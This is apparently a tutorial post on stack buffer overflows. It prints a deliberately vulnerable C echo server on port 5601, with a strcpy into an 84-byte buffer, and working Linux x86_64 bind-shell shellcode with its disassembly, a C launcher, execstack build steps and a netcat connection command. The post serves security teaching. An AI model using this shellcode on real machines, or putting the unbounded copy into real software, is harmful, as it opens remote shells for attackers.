Buffer overflow is a vulnerability that puts your system at high risk. It can give an attacker unrestricted access and allow shellcode injection; that is, the attacker can execute arbitrary malicious code on the target machine. This video tutorial shows how attackers exploit remote services running on remote systems and how they gain access to them. Here I'm using a custom socket program which is vulnerable to a stack buffer overflow. The program is an ECHO server that listens on port 5601.
Vulnerable Code
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
/*
http://www.terminalcoders.blogspot.com
BOF Tutorial
Video: https://youtu.be/uPfBkU0LqBA
*/
/*
 * Copies the request into a fixed-size local buffer and discards it.
 *
 * DEFECT (intentional; this is the tutorial's target): the parameter is
 * declared as char[8000] but decays to a plain pointer, so it carries no
 * bound, while cpy holds only 84 bytes. strcpy() copies until the first
 * NUL, so any request of 84 bytes or more overwrites the stack beyond cpy
 * (saved registers, return address). The caller fills str with read()
 * and does not NUL-terminate it, so strcpy() can also read past the end
 * of str when a request fills all 8000 bytes.
 *
 * Mitigation, for reference: bound the copy to the destination, e.g.
 * snprintf(cpy, sizeof cpy, "%s", str), or reject requests longer than
 * the buffer before copying; build with stack protectors so an overflow
 * aborts instead of hijacking control flow.
 */
void copy(char str[8000]){ //Vulnerable function
char cpy[84];
strcpy(cpy, str); //Vulnerable section
}
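/*
 * Accepts one TCP client on port 5601 and echoes each request back to it.
 *
 * Every request is still passed through copy(), the tutorial's intentionally
 * overflowable function; that call is unchanged. What this version fixes is
 * the surrounding server code:
 *   - socket(), bind(), listen() and accept() results are checked and the
 *     descriptors are closed on every exit path;
 *   - the read() length is checked and the request is NUL-terminated (the
 *     original read() could fill all 8000 bytes with no terminator, so
 *     puts(), strlen() and the strcpy() inside copy() ran off the end);
 *   - a closed connection (read() returning 0) ends the loop instead of
 *     spinning forever echoing stale data;
 *   - the unused cpy[64] local is gone and bzero() is replaced by memset().
 *
 * Returns nothing; failures are reported with perror() on stderr.
 */
void start_server(){
    char str[8000];
    int sfd, cfd;
    struct sockaddr_in sock;

    sfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sfd < 0) {
        perror("socket");
        return;
    }

    memset(&sock, 0, sizeof sock);
    sock.sin_family = AF_INET;
    /* htonl, not htons: the address field is 32 bits (INADDR_ANY is 0 either way). */
    sock.sin_addr.s_addr = htonl(INADDR_ANY);
    sock.sin_port = htons(5601); /* listening port */

    if (bind(sfd, (struct sockaddr *) &sock, sizeof sock) < 0) {
        perror("bind");
        close(sfd);
        return;
    }
    if (listen(sfd, 10) < 0) {
        perror("listen");
        close(sfd);
        return;
    }

    cfd = accept(sfd, (struct sockaddr *) NULL, NULL);
    if (cfd < 0) {
        perror("accept");
        close(sfd);
        return;
    }

    for (;;) {
        /* Leave one byte free so the request can always be NUL-terminated. */
        ssize_t n = read(cfd, str, sizeof str - 1);
        if (n <= 0) {
            if (n < 0) {
                perror("read");
            }
            break; /* n == 0: peer closed the connection */
        }
        str[n] = '\0';
        copy(str); /* intentionally unbounded copy into an 84-byte stack buffer */
        puts(str);
        if (write(cfd, str, strlen(str) + 1) < 0) {
            perror("write");
            break;
        }
    }

    close(cfd);
    close(sfd);
}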
/* Program entry point: runs the echo server. Command-line arguments are not used. */
int main(int argc, char **argv){
    (void)argc;
    (void)argv;
    start_server();
    return 0;
}
ShellCode
/*
---------------------------------------------------------------------------------------------------
Linux/x86_64 - Bind 5600 TCP Port - shellcode - 87 bytes
Ajith Kp [ http://fb.com/ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
0000000000400080 <.text>:
400080: 48 31 c0 xor %rax,%rax
400083: 48 31 d2 xor %rdx,%rdx
400086: 48 31 f6 xor %rsi,%rsi
400089: ff c6 inc %esi
40008b: 6a 29 pushq $0x29
40008d: 58 pop %rax
40008e: 6a 02 pushq $0x2
400090: 5f pop %rdi
400091: 0f 05 syscall
400093: 48 97 xchg %rax,%rdi
400095: 6a 02 pushq $0x2
400097: 66 c7 44 24 02 15 e0 movw $0xe015,0x2(%rsp)
40009e: 54 push %rsp
40009f: 5e pop %rsi
4000a0: 52 push %rdx
4000a1: 6a 31 pushq $0x31
4000a3: 58 pop %rax
4000a4: 6a 10 pushq $0x10
4000a6: 5a pop %rdx
4000a7: 0f 05 syscall
4000a9: 5e pop %rsi
4000aa: 6a 32 pushq $0x32
4000ac: 58 pop %rax
4000ad: 0f 05 syscall
4000af: 6a 2b pushq $0x2b
4000b1: 58 pop %rax
4000b2: 0f 05 syscall
4000b4: 48 97 xchg %rax,%rdi
4000b6: 6a 03 pushq $0x3
4000b8: 5e pop %rsi
4000b9: ff ce dec %esi
4000bb: b0 21 mov $0x21,%al
4000bd: 0f 05 syscall
4000bf: 75 f8 jne 0x4000b9
4000c1: f7 e6 mul %esi
4000c3: 52 push %rdx
4000c4: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
4000cb: 2f 73 68
4000ce: 53 push %rbx
4000cf: 48 8d 3c 24 lea (%rsp),%rdi
4000d3: b0 3b mov $0x3b,%al
4000d5: 0f 05 syscall
---------------------------------------------------------------------------------------------------
How To Run
$ gcc -o bind_shell bind_shell.c
$ execstack -s bind_shell
$ ./bind_shell
How to Connect
$ nc <HOST IP ADDRESS> 5600
Eg:
$ nc 127.0.0.1 5600
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
/* The machine code from the disassembly listed above, stored as ordinary
 * initialized data. Data pages are normally not executable; the "How To Run"
 * steps above mark the binary with execstack -s so that calling into this
 * array works at all, which is exactly what NX / W^X protections exist to
 * prevent. */
char sh[]="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
/* Test harness: casts the sh[] byte array to a function pointer and calls it,
 * so execution continues inside the bytes. Converting an object pointer to a
 * function pointer is not defined by ISO C; it only behaves as a call because
 * of the Linux/x86_64 target named in the listing header, and only if the page
 * holding sh[] is executable (see the execstack step above). The function
 * never returns normally. `void main` is non-standard; hosted C requires
 * `int main`. */
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}
